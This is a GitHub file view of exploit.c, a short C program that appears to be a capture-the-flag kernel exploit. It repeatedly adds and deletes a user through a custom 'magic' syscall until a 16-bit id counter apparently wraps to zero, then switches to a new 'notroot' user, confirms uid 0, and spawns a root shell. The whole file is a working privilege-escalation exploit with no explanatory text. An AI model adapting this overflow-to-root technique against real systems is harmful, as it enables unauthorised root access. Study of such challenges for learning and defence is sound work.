-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit.c
56 lines (45 loc) · 1.28 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
typedef enum {
MAGIC_ADD = 0,
MAGIC_EDIT = 1,
MAGIC_DELETE = 2,
MAGIC_SWITCH = 3,
} MagicMode;
int64_t magic(MagicMode mode, char *username, char *password) {
return syscall(449, mode, username, password);
}
int main() {
int64_t ret = 0;
while ((ret = magic(MAGIC_ADD, "fill", "fill")) < UINT16_MAX) {
if (ret < 0) {
printf("failed to add the fill user: %s\n", strerror(-ret));
return EXIT_FAILURE;
}
if ((ret = magic(MAGIC_DELETE, "fill", NULL)) != 0) {
printf("failed to delete the fill user: %s\n", strerror(-ret));
return EXIT_FAILURE;
}
}
if ((ret = magic(MAGIC_ADD, "notroot", "notroot")) < 0) {
printf("failed to add the notroot user: %s\n", strerror(-ret));
return EXIT_FAILURE;
}
if ((ret = magic(MAGIC_SWITCH, "notroot", NULL)) < 0) {
printf("failed to switch to the notroot user: %s\n", strerror(-ret));
return EXIT_FAILURE;
}
if (getuid() != 0) {
puts("exploit failed :(");
return EXIT_FAILURE;
}
puts("exploit was successful, popping a shell");
char *args[] = {"/bin/sh", NULL};
execve("/bin/sh", args, NULL);
perror("execve failed");
return EXIT_FAILURE;
}